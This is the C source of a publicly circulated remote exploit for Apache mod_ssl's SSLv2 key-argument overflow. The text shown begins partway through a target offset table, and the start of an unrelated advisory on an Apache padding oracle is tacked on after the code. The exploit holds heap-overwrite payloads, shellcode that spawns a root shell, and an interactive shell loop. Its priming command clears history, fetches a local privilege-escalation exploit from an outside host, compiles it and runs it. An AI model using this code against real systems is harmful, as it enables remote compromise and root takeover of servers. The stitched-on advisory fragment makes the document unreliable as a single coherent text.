{"FreeBSD 4.6.2-Release-p6 (apache-1.3.26)",0x080c432c},
{"FreeBSD 4.6-Realease (apache-1.3.26)",0x0808fdec},
{"FreeBSD (apache-1.3.27)",0x080902e4},
{"Gentoo Linux (apache-1.3.24-r2)",0x08086c34},
{"Linux Generic (apache-1.3.14)",0xbffff500},
{"Mandrake Linux X.x (apache-1.3.22-10.1mdk)",0x080808ab},
{"Mandrake Linux 7.1 (apache-1.3.14-2)",0x0809f6c4},
{"Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)",0x0809d233},
{"Mandrake Linux 7.2 (apache-1.3.14-2mdk)",0x0809f6ef},
{"Mandrake Linux 7.2 (apache-1.3.14) 2",0x0809d6c4},
{"Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)",0x0809ccde},
{"Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)",0x0809ce14},
{"Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)",0x0809d262},
{"Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)",0x08083545},
{"Mandrake Linux 8.0 (apache-1.3.19-3)",0x0809ea98},
{"Mandrake Linux 8.1 (apache-1.3.20-3)",0x0809e97c},
{"Mandrake Linux 8.2 (apache-1.3.23-4)",0x08086580},
{"Mandrake Linux 8.2 #2 (apache-1.3.23-4)",0x08086484},
{"Mandrake Linux 8.2 (apache-1.3.24)",0x08086665},
{"Mandrake Linux 9 (apache-1.3.26)",0x0808b864},
{"RedHat Linux ?.? GENERIC (apache-1.3.12-1)",0x0808c0f4},
{"RedHat Linux TEST1 (apache-1.3.12-1)",0x0808c0f4},
{"RedHat Linux TEST2 (apache-1.3.12-1)",0x0808c0f4},
{"RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)",0x080d2c35},
{"RedHat Linux 4.2 (apache-1.1.3-3)",0x08065bae},
{"RedHat Linux 5.0 (apache-1.2.4-4)",0x0808c82c},
{"RedHat Linux 5.1-Update (apache-1.2.6)",0x08092a45},
{"RedHat Linux 5.1 (apache-1.2.6-4)",0x08092c2d},
{"RedHat Linux 5.2 (apache-1.3.3-1)",0x0806f049},
{"RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)",0x0808e4d8},
{"RedHat Linux 6.0 (apache-1.3.6-7)",0x080707ec},
{"RedHat Linux 6.0 (apache-1.3.6-7)",0x080707f9},
{"RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)",0x0808fd52},
{"RedHat Linux 6.0 Update (apache-1.3.24)",0x80acd58},
{"RedHat Linux 6.1 (apache-1.3.9-4)1",0x0808ccc4},
{"RedHat Linux 6.1 (apache-1.3.9-4)2",0x0808ccdc},
{"RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)",0x0808fd5d},
{"RedHat Linux 6.1-fp2000 (apache-1.3.26)",0x082e6fcd},
{"RedHat Linux 6.2 (apache-1.3.12-2)1",0x0808f689},
{"RedHat Linux 6.2 (apache-1.3.12-2)2",0x0808f614},
{"RedHat Linux 6.2 mod(apache-1.3.12-2)3",0xbffff94c},
{"RedHat Linux 6.2 update (apache-1.3.22-5.6)1",0x0808f9ec},
{"RedHat Linux 6.2-Update (apache-1.3.22-5.6)2",0x0808f9d4},
{"Redhat Linux 7.x (apache-1.3.22)",0x0808400c},
{"RedHat Linux 7.x (apache-1.3.26-1)",0x080873bc},
{"RedHat Linux 7.x (apache-1.3.27)",0x08087221},
{"RedHat Linux 7.0 (apache-1.3.12-25)1",0x0809251c},
{"RedHat Linux 7.0 (apache-1.3.12-25)2",0x0809252d},
{"RedHat Linux 7.0 (apache-1.3.14-2)",0x08092b98},
{"RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)",0x08084358},
{"RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)",0x0808438c},
{"RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)",0x08086e41},
{"RedHat Linux 7.1 (apache-1.3.19-5)1",0x0809af8c},
{"RedHat Linux 7.1 (apache-1.3.19-5)2",0x0809afd9},
{"RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)",0x0808438c},
{"RedHat Linux 7.1-Update (1.3.22-5.7.1)",0x08084389},
{"RedHat Linux 7.1 (apache-1.3.22-src)",0x0816021c},
{"RedHat Linux 7.1-Update (1.3.27-1.7.1)",0x08086ec89},
{"RedHat Linux 7.2 (apache-1.3.20-16)1",0x080994e5},
{"RedHat Linux 7.2 (apache-1.3.20-16)2",0x080994d4},
{"RedHat Linux 7.2-Update (apache-1.3.22-6)",0x08084045},
{"RedHat Linux 7.2 (apache-1.3.24)",0x80b0938},
{"RedHat Linux 7.2 (apache-1.3.26)",0x08161c16},
{"RedHat Linux 7.2 (apache-1.3.26-snc)",0x8161c14},
{"Redhat Linux 7.2 (apache-1.3.26 w/PHP)1",0x08269950},
{"Redhat Linux 7.2 (apache-1.3.26 w/PHP)2",0x08269988},
{"RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)",0x08086af9},
{"RedHat Linux 7.3 (apache-1.3.23-11)1",0x0808528c},
{"RedHat Linux 7.3 (apache-1.3.23-11)2",0x0808525f},
{"RedHat Linux 7.3 (apache-1.3.27)",0x080862e4},
{"RedHat Linux 8.0 (apache-1.3.27)",0x08084c1c},
{"RedHat Linux 8.0-second (apache-1.3.27)",0x0808151e},
{"RedHat Linux 8.0 (apache-2.0.40)",0x08092fa4},
{"Slackware Linux 4.0 (apache-1.3.6)",0x08088130},
{"Slackware Linux 7.0 (apache-1.3.9)",0x080a7fc0},
{"Slackware Linux 7.0 (apache-1.3.26)",0x083d37fc},
{"Slackware 7.0 (apache-1.3.26)2",0x083d2232},
{"Slackware Linux 7.1 (apache-1.3.12)",0x080a86a4},
{"Slackware Linux 8.0 (apache-1.3.20)",0x080ae67c},
{"Slackware Linux 8.1 (apache-1.3.24)",0x080b0c60},
{"Slackware Linux 8.1 (apache-1.3.26)",0x080b2100},
{"Slackware Linux 8.1-stable (apache-1.3.26)",0x080b0c60},
{"Slackware Linux (apache-1.3.27)",0x080b1a3a},
{"SuSE Linux 7.0 (apache-1.3.12)",0x0809f54c},
{"SuSE Linux 7.1 (apache-1.3.17)",0x08099984},
{"SuSE Linux 7.2 (apache-1.3.19)",0x08099ec8},
{"SuSE Linux 7.3 (apache-1.3.20)",0x08099da8},
{"SuSE Linux 8.0 (apache-1.3.23)",0x08086168},
{"SUSE Linux 8.0 (apache-1.3.23-120)",0x080861c8},
{"SuSE Linux 8.0 (apache-1.3.23-137)",0x080861c8},
/* this one unchecked cause require differend shellcode */
{"Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)",0xfd42630},
};
extern int errno;
int cipher;
int ciphers;
/* the offset of the local port from be beginning of the overwrite next chunk buffer */
#define FINDSCKPORTOFS 208 + 12 + 46
unsigned char overwrite_session_id_length[] =
"AAAA" /* int master key length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH]; */
"\x70\x00\x00\x00"; /* unsigned int session id length; */
unsigned char overwrite_next_chunk[] =
"AAAA" /* int master key length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH]; */
"AAAA" /* unsigned int session id length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char session id[SSL MAX SSL SESSION ID LENGTH]; */
"AAAA" /* unsigned int sid ctx length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid ctx[SSL MAX SID CTX LENGTH]; */
"AAAA" /* int not resumable; */
"\x00\x00\x00\x00" /* struct sess cert st *sess cert; */
"\x00\x00\x00\x00" /* X509 *peer; */
"AAAA" /* long verify result; */
"\x01\x00\x00\x00" /* int references; */
"AAAA" /* int timeout; */
"AAAA" /* int time */
"AAAA" /* int compress meth; */
"\x00\x00\x00\x00" /* SSL CIPHER *cipher; */
"AAAA" /* unsigned long cipher id; */
"\x00\x00\x00\x00" /* STACK OF(SSL CIPHER) *ciphers; */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* CRYPTO EX DATA ex data; */
"AAAAAAAA" /* struct ssl session st *prev,*next; */
"\x00\x00\x00\x00" /* Size of previous chunk */
"\x11\x00\x00\x00" /* Size of chunk, in bytes */
"fdfd" /* Forward and back pointers */
"bkbk"
"\x10\x00\x00\x00" /* Size of previous chunk */
"\x10\x00\x00\x00" /* Size of chunk, PREV INUSE is set */
/* shellcode start */
"\xeb\x0a\x90\x90" /* jump 10 bytes ahead, land at shellcode */
"\x90\x90\x90\x90"
"\x90\x90\x90\x90" /* this is overwritten with FD by the unlink macro */
/* 72 bytes findsckcode by LSD-pl */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xe7" /* movl %esp,%edi */
"\x8d\x77\x10" /* leal 0x10(%edi),%esi */
"\x89\x77\x04" /* movl %esi,0x4(%edi) */
"\x8d\x4f\x20" /* leal 0x20(%edi),%ecx */
"\x89\x4f\x08" /* movl %ecx,0x8(%edi) */
"\xb3\x10" /* movb $0x10,%bl */
"\x89\x19" /* movl %ebx,(%ecx) */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\xff" /* movb $0xff,%cl */
"\x89\x0f" /* movl %ecx,(%edi) */
"\x51" /* pushl %ecx */
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x07" /* movb $0x07,%bl */
"\x89\xf9" /* movl %edi,%ecx */
"\xcd\x80" /* int $0x80 */
"\x59" /* popl %ecx */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x39\xd8" /* cmpl %ebx,%eax */
"\x75\x0a" /* jne <findsckcode+54> */
"\x66\xb8\x12\x34" /* movw $0x1234,%bx */
"\x66\x39\x46\x02" /* cmpw %bx,0x2(%esi) */
"\x74\x02" /* je <findsckcode+56> */
"\xe2\xe0" /* loop <findsckcode+24> */
"\x89\xcb" /* movl %ecx,%ebx */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\x03" /* movb $0x03,%cl */
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x3f" /* movb $0x3f,%al */
"\x49" /* decl %ecx */
"\xcd\x80" /* int $0x80 */
"\x41" /* incl %ecx */
"\xe2\xf6" /* loop <findsckcode+62> */
/* 10 byte setresuid(0,0,0); by core */
"\x31\xc9" /* xor %ecx,%ecx */
"\xf7\xe1" /* mul %ecx,%eax */
"\x51" /* push %ecx */
"\x5b" /* pop %ebx */
"\xb0\xa4" /* mov $0xa4,%al */
"\xcd\x80" /* int $0x80 */
/* bigger shellcode added by spabam */
/* "\xB8\x2F\x73\x68\x23\x25\x2F\x73\x68\xDC\x50\x68\x2F\x62\x69"
"\x6E\x89\xE3\x31\xC0\x50\x53\x89\xE1\x04\x0B\x31\xD2\xCD\x80"
*/
/* 24 bytes execl("/bin/sh", "/bin/sh", 0); by LSD-pl */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80"; /* int $0x80 */
/* read and write buffer*/
#define BUFSIZE 16384
/* hardcoded protocol stuff */
#define CHALLENGE_LENGTH 16
#define RC4_KEY_LENGTH 16 /* 128 bits */
#define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2)
/* straight from the openssl source */
#define n2s(c,s) ((s=(((unsigned int)(c[0]))<< 8)| (((unsigned int)(c[1])) )),c+=2)
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), c[1]=(unsigned char)(((s) )&0xff)),c+=2)
/* we keep all SSL2 state in this structure */
typedef struct {
int sock;
/* client stuff */
unsigned char challenge[CHALLENGE_LENGTH];
unsigned char master_key[RC4_KEY_LENGTH];
unsigned char key_material[RC4_KEY_MATERIAL_LENGTH];
/* connection id - returned by the server */
int conn_id_length;
unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
/* server certificate */
X509 *x509;
/* session keys */
unsigned char* read_key;
unsigned char* write_key;
RC4_KEY* rc4_read_key;
RC4_KEY* rc4_write_key;
/* sequence numbers, used for MAC calculation */
int read_seq;
int write_seq;
/* set to 1 when the SSL2 handshake is complete */
int encrypted;
} ssl_conn;
#define COMMAND1 "TERM=xterm; export TERM=xterm; exec bash -i\n"
#define COMMAND2 "unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmod.c; ./exploit; \n"
long getip(char *hostname) {
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) {
perror("gethostbyname()");
exit(-1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
/* mixter's code w/enhancements by core */
int sh(int sockfd) {
char snd[1024], rcv[1024];
fd_set rset;
int maxfd, n;
/* Priming commands */
strcpy(snd, COMMAND1 "\n");
write(sockfd, snd, strlen(snd));
strcpy(snd, COMMAND2 "\n");
write(sockfd, snd, strlen(snd));
/* Main command loop */
for (;;) {
FD_SET(fileno(stdin), &rset);
FD_SET(sockfd, &rset);
maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if (FD_ISSET(fileno(stdin), &rset)) {
bzero(snd, sizeof(snd));
fgets(snd, sizeof(snd)-2, stdin);
write(sockfd, snd, strlen(snd));
}
if (FD_ISSET(sockfd, &rset)) {
bzero(rcv, sizeof(rcv));
if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) {
printf("Good Bye!\n");
return 0;
}
if (n < 0) {
perror("read");
return 1;
}
fputs(rcv, stdout);
fflush(stdout); /* keeps output nice */
}
} /* for(;;) */
}
/* Returns the local port of a connected socket */
int get_local_port(int sock)
{
struct sockaddr_in s_in;
unsigned int namelen = sizeof(s_in);
if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) {
printf("Can't get local port: %s\n", strerror(errno));
exit(1);
}
return s_in.sin_port;
}
/* Connect to a host */
int connect_host(char* host, int port)
{
struct sockaddr_in s_in;
int sock;
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = getip(host);
s_in.sin_port = htons(port);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) {
printf("Could not create a socket\n");
exit(1);
}
if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) {
printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno));
exit(1);
}
return sock;
}
/* Create a new ssl conn structure and connect to a host */
ssl_conn* ssl_connect_host(char* host, int port)
{
ssl_conn* ssl;
if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) {
printf("Can't allocate memory\n");
exit(1);
}
/* Initialize some values */
ssl->encrypted = 0;
ssl->write_seq = 0;
ssl->read_seq = 0;
ssl->sock = connect_host(host, port);
return ssl;
}
/* global buffer used by the ssl result() */
char res_buf[30];
/* converts an SSL error code to a string */
char* ssl_error(int code) {
switch (code) {
case 0x00: return "SSL2 PE UNDEFINED ERROR (0x00)";
case 0x01: return "SSL2 PE NO CIPHER (0x01)";
case 0x02: return "SSL2 PE NO CERTIFICATE (0x02)";
case 0x04: return "SSL2 PE BAD CERTIFICATE (0x03)";
case 0x06: return "SSL2 PE UNSUPPORTED CERTIFICATE TYPE (0x06)";
default:
sprintf(res_buf, "%02x", code);
return res_buf;
}
}
/* read len bytes from a socket. boring. */
int read_data(int sock, unsigned char* buf, int len)
{
int l;
int to_read = len;
do {
if ((l = read(sock, buf, to_read)) < 0) {
printf("Error in read: %s\n", strerror(errno));
exit(1);
}
to_read -= len;
} while (to_read > 0);
return len;
}
/* reads an SSL packet and decrypts it if necessery */
int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int buf_size)
{
int rec_len, padding;
read_data(ssl->sock, buf, 2);
if ((buf[0] & 0x80) == 0) {
/* three byte header */
rec_len = ((buf[0] & 0x3f) << 8) | buf[1];
read_data(ssl->sock, &buf[2], 1);
padding = (int)buf[2];
}
else {
/* two byte header */
rec_len = ((buf[0] & 0x7f) << 8) | buf[1];
padding = 0;
}
if ((rec_len <= 0) || (rec_len > buf_size)) {
printf("read_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len);
exit(1);
}
read_data(ssl->sock, buf, rec_len);
if (ssl->encrypted) {
if (MD5_DIGEST_LENGTH + padding >= rec_len) {
if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) {
/* the server didn't switch to encryption due to an error */
return 0;
}
else {
printf("read_ssl_packet: Encrypted message is too short (rec_len = %d)\n", rec_len);
exit(1);
}
}
/* decrypt the encrypted part of the packet */
RC4(ssl->rc4_read_key, rec_len, buf, buf);
/* move the decrypted message in the beginning of the buffer */
rec_len = rec_len - MD5_DIGEST_LENGTH - padding;
memmove(buf, buf + MD5_DIGEST_LENGTH, rec_len);
}
if (buf[0] == SSL2_MT_ERROR) {
if (rec_len != 3) {
printf("Malformed server error message\n");
exit(1);
}
else {
return 0;
}
}
return rec_len;
}
/* send an ssl packet, encrypting it if ssl->encrypted is set */
void send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len)
{
unsigned char buf[BUFSIZE];
unsigned char* p;
int tot_len;
MD5_CTX ctx;
int seq;
if (ssl->encrypted)
tot_len = rec_len + MD5_DIGEST_LENGTH; /* RC4 needs no padding */
else
tot_len = rec_len;
if (2 + tot_len > BUFSIZE) {
printf("send_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len);
exit(1);
}
p = buf;
s2n(tot_len, p);
buf[0] = buf[0] | 0x80; /* two byte header */
if (ssl->encrypted) {
/* calculate the MAC */
seq = ntohl(ssl->write_seq);
MD5_Init(&ctx);
MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
MD5_Update(&ctx, rec, rec_len);
MD5_Update(&ctx, &seq, 4);
MD5_Final(p, &ctx);
p+=MD5_DIGEST_LENGTH;
memcpy(p, rec, rec_len);
/* encrypt the payload */
RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
}
else {
memcpy(p, rec, rec_len);
}
send(ssl->sock, buf, 2 + tot_len, 0);
/* the sequence number is incremented by both encrypted and plaintext packets
*/
ssl->write_seq++;
}
/* Send a CLIENT HELLO message to the server */
void send_client_hello(ssl_conn *ssl)
{
int i;
unsigned char buf[BUFSIZE] =
"\x01" /* client hello msg */
"\x00\x02" /* client version */
"\x00\x18" /* cipher specs length */
"\x00\x00" /* session id length */
"\x00\x10" /* challenge length */
"\x07\x00\xc0\x05\x00\x80\x03\x00" /* cipher specs data */
"\x80\x01\x00\x80\x08\x00\x80\x06"
"\x00\x40\x04\x00\x80\x02\x00\x80"
""; /* session id data */
/* generate CHALLENGE LENGTH bytes of challenge data */
for (i = 0; i < CHALLENGE_LENGTH; i++) {
ssl->challenge[i] = (unsigned char) (rand() >> 24);
}
memcpy(&buf[33], ssl->challenge, CHALLENGE_LENGTH);
send_ssl_packet(ssl, buf, 33 + CHALLENGE_LENGTH);
}
/* Get a SERVER HELLO response from the server */
void get_server_hello(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
const unsigned char *p, *end;
int len;
int server_version, cert_length, cs_length, conn_id_length;
int found;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
exit(1);
}
if (len < 11) {
printf("get_server_hello: Packet too short (len = %d)\n", len);
exit(1);
}
p = buf;
if (*(p++) != SSL2_MT_SERVER_HELLO) {
printf("get_server_hello: Expected SSL2 MT SERVER HELLO, got %x\n", (int)p[-1]);
exit(1);
}
if (*(p++) != 0) {
printf("get_server_hello: SESSION-ID-HIT is not 0\n");
exit(1);
}
if (*(p++) != 1) {
printf("get_server_hello: CERTIFICATE-TYPE is not SSL CT X509 CERTIFICATE\n");
exit(1);
}
n2s(p, server_version);
if (server_version != 2) {
printf("get_server_hello: Unsupported server version %d\n", server_version);
exit(1);
}
n2s(p, cert_length);
n2s(p, cs_length);
n2s(p, conn_id_length);
if (len != 11 + cert_length + cs_length + conn_id_length) {
printf("get_server_hello: Malformed packet size\n");
exit(1);
}
/* read the server certificate */
ssl->x509 = NULL;
ssl->x509=d2i_X509(NULL,&p,(long)cert_length);
if (ssl->x509 == NULL) {
printf("get server hello: Cannot parse x509 certificate\n");
exit(1);
}
if (cs_length % 3 != 0) {
printf("get server hello: CIPHER-SPECS-LENGTH is not a multiple of 3\n");
exit(1);
}
found = 0;
for (end=p+cs_length; p < end; p += 3) {
if ((p[0] == 0x01) && (p[1] == 0x00) && (p[2] == 0x80))
found = 1; /* SSL CK RC4 128 WITH MD5 */
}
if (!found) {
printf("get server hello: Remote server does not support 128 bit RC4\n");
exit(1);
}
if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH) {
printf("get server hello: CONNECTION-ID-LENGTH is too long\n");
exit(1);
}
/* The connection id is sent back to the server in the CLIENT FINISHED packet */
ssl->conn_id_length = conn_id_length;
memcpy(ssl->conn_id, p, conn_id_length);
}
/* Send a CLIENT MASTER KEY message to the server */
void send_client_master_key(ssl_conn* ssl, unsigned char* key_arg_overwrite, int key_arg_overwrite_len) {
int encrypted_key_length, key_arg_length, record_length;
unsigned char* p;
int i;
EVP_PKEY *pkey=NULL;
unsigned char buf[BUFSIZE] =
"\x02" /* client master key message */
"\x01\x00\x80" /* cipher kind */
"\x00\x00" /* clear key length */
"\x00\x40" /* encrypted key length */
"\x00\x08"; /* key arg length */
p = &buf[10];
/* generate a 128 byte master key */
for (i = 0; i < RC4_KEY_LENGTH; i++) {
ssl->master_key[i] = (unsigned char) (rand() >> 24);
}
pkey=X509_get_pubkey(ssl->x509);
if (!pkey) {
printf("send client master key: No public key in the server certificate\n");
exit(1);
}
if (EVP_PKEY_get1_RSA(pkey) == NULL) {
printf("send client master key: The public key in the server certificate is not a RSA key\n");
exit(1);
}
/* Encrypt the client master key with the server public key and put it in the packet */
encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
if (encrypted_key_length <= 0) {
printf("send client master key: RSA encryption failure\n");
exit(1);
}
p += encrypted_key_length;
if (key_arg_overwrite) {
/* These 8 bytes fill the key arg array on the server */
for (i = 0; i < 8; i++) {
*(p++) = (unsigned char) (rand() >> 24);
}
/* This overwrites the data following the key arg array */
memcpy(p, key_arg_overwrite, key_arg_overwrite_len);
key_arg_length = 8 + key_arg_overwrite_len;
}
else {
key_arg_length = 0; /* RC4 doesn't use KEY-ARG */
}
p = &buf[6];
s2n(encrypted_key_length, p);
s2n(key_arg_length, p);
record_length = 10 + encrypted_key_length + key_arg_length;
send_ssl_packet(ssl, buf, record_length);
ssl->encrypted = 1;
}
void generate_key_material(ssl_conn* ssl)
{
unsigned int i;
MD5_CTX ctx;
unsigned char *km;
unsigned char c='0';
km=ssl->key_material;
for (i=0; i<RC4_KEY_MATERIAL_LENGTH; i+=MD5_DIGEST_LENGTH) {
MD5_Init(&ctx);
MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
MD5_Update(&ctx,&c,1);
c++;
MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
MD5_Final(km,&ctx);
km+=MD5_DIGEST_LENGTH;
}
}
void generate_session_keys(ssl_conn* ssl)
{
generate_key_material(ssl);
ssl->read_key = &(ssl->key_material[0]);
ssl->rc4_read_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
ssl->write_key = &(ssl->key_material[RC4_KEY_LENGTH]);
ssl->rc4_write_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
}
void get_server_verify(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
int len;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
exit(1);
}
if (len != 1 + CHALLENGE_LENGTH) {
printf("get server verify: Malformed packet size\n");
exit(1);
}
if (buf[0] != SSL2_MT_SERVER_VERIFY) {
printf("get server verify: Expected SSL2 MT SERVER VERIFY, got %x\n", (int)buf[0]);
exit(1);
}
if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH)) {
printf("get server verify: Challenge strings don't match\n");
exit(1);
}
}
void send_client_finished(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
buf[0] = SSL2_MT_CLIENT_FINISHED;
memcpy(&buf[1], ssl->conn_id, ssl->conn_id_length);
send_ssl_packet(ssl, buf, 1+ssl->conn_id_length);
}
void get_server_finished(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
int len;
int i;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
exit(1);
}
if (buf[0] != SSL2_MT_SERVER_FINISHED) {
printf("get server finished: Expected SSL2 MT SERVER FINISHED, got %x\n", (int)buf[0]);
exit(1);
}
if (len <= 112 /*17*/) {
printf("This server is not vulnerable to this attack.\n");
exit(1);
}
cipher = *(int*)&buf[101];
ciphers = *(int*)&buf[109];
printf("cipher: 0x%x ciphers: 0x%x\n", cipher, ciphers);
}
void get_server_error(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
int len;
if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0) {
printf("get server finished: Expected SSL2 MT ERROR, got %x\n", (int)buf[0]);
exit(1);
}
}
void usage(char* argv0)
{
int i;
printf(": Usage: %s target box [port] [-c N]\n\n", argv0);
printf(" target - supported box eg: 0x00\n");
printf(" box - hostname or IP address\n");
printf(" port - port for ssl connection\n");
printf(" -c open N connections. (use range 40-50 if u dont know)\n");
printf(" \n\n");
printf(" Supported OffSet:\n");
for (i=0; i<=MAX_ARCH; i++) {
printf("\t0x%02x - %s\n", i, architectures[i].desc);
}
printf("\nFuck to all guys who like use lamah ddos. Read SRC to have no surprise\n");
exit(1);
}
int main(int argc, char* argv[])
{
char* host;
int port = 443;
int i;
int arch;
int N = 0;
ssl_conn* ssl1;
ssl_conn* ssl2;
printf("\n");
printf("*******************************************************************\n");
printf("* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *\n");
printf("*******************************************************************\n");
printf("* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *\n");
printf("* #hackarena irc.brasnet.org *\n");
printf("* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *\n");
printf("* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *\n");
printf("* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *\n");
printf("*******************************************************************\n");
printf("\n");
if ((argc < 3) || (argc > 6))
usage(argv[0]);
sscanf(argv[1], "0x%x", &arch);
if ((arch < 0) || (arch > MAX_ARCH))
usage(argv[0]);
host = argv[2];
if (argc == 4)
port = atoi(argv[3]);
else if (argc == 5) {
if (strcmp(argv[3], "-c"))
usage(argv[0]);
N = atoi(argv[4]);
}
else if (argc == 6) {
port = atoi(argv[3]);
if (strcmp(argv[4], "-c"))
usage(argv[0]);
N = atoi(argv[5]);
}
srand(0x31337);
for (i=0; i<N; i++) {
printf("\rConnection... %d of %d", i+1, N);
fflush(stdout);
connect_host(host, port);
usleep(100000);
}
if (N) printf("\n");
printf("Establishing SSL connection\n");
ssl1 = ssl_connect_host(host, port);
ssl2 = ssl_connect_host(host, port);
send_client_hello(ssl1);
get_server_hello(ssl1);
send_client_master_key(ssl1, overwrite_session_id_length, sizeof(overwrite_session_id_length)-1);
generate_session_keys(ssl1);
get_server_verify(ssl1);
send_client_finished(ssl1);
get_server_finished(ssl1);
printf("Ready to send shellcode\n");
port = get_local_port(ssl2->sock);
overwrite_next_chunk[FINDSCKPORTOFS] = (char) (port & 0xff);
overwrite_next_chunk[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff);
*(int*)&overwrite_next_chunk[156] = cipher;
*(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr - 12;
*(int*)&overwrite_next_chunk[196] = ciphers + 16; /* shellcode address */
send_client_hello(ssl2);
get_server_hello(ssl2);
send_client_master_key(ssl2, overwrite_next_chunk, sizeof(overwrite_next_chunk)-1);
generate_session_keys(ssl2);
get_server_verify(ssl2);
for (i = 0; i < ssl2->conn_id_length; i++) {
ssl2->conn_id[i] = (unsigned char) (rand() >> 24);
}
send_client_finished(ssl2);
get_server_error(ssl2);
printf("Spawning shell...\n");
sleep(1);
sh(ssl2->sock);
close(ssl2->sock);
close(ssl1->sock);
return 0;
}
/* spabam: It isn't 0day */
'''
Advisory: Padding Oracle in Apache mod_session_crypto
During a penetration test, RedTeam Pentesting discovered a Padding
Oracle vulnerability in mod_session_crypto of the Apache web server.
This vulnerability can be exploited to decrypt the session data and even
encrypt attacker-specified data.
Details
=======
Product: Apache HTTP Server mod_session_crypto
Affected Versions: 2.3 to 2.5
Fixed Versions: 2.4.25
Vulnerability Type: Padding Oracle
Security Risk: high
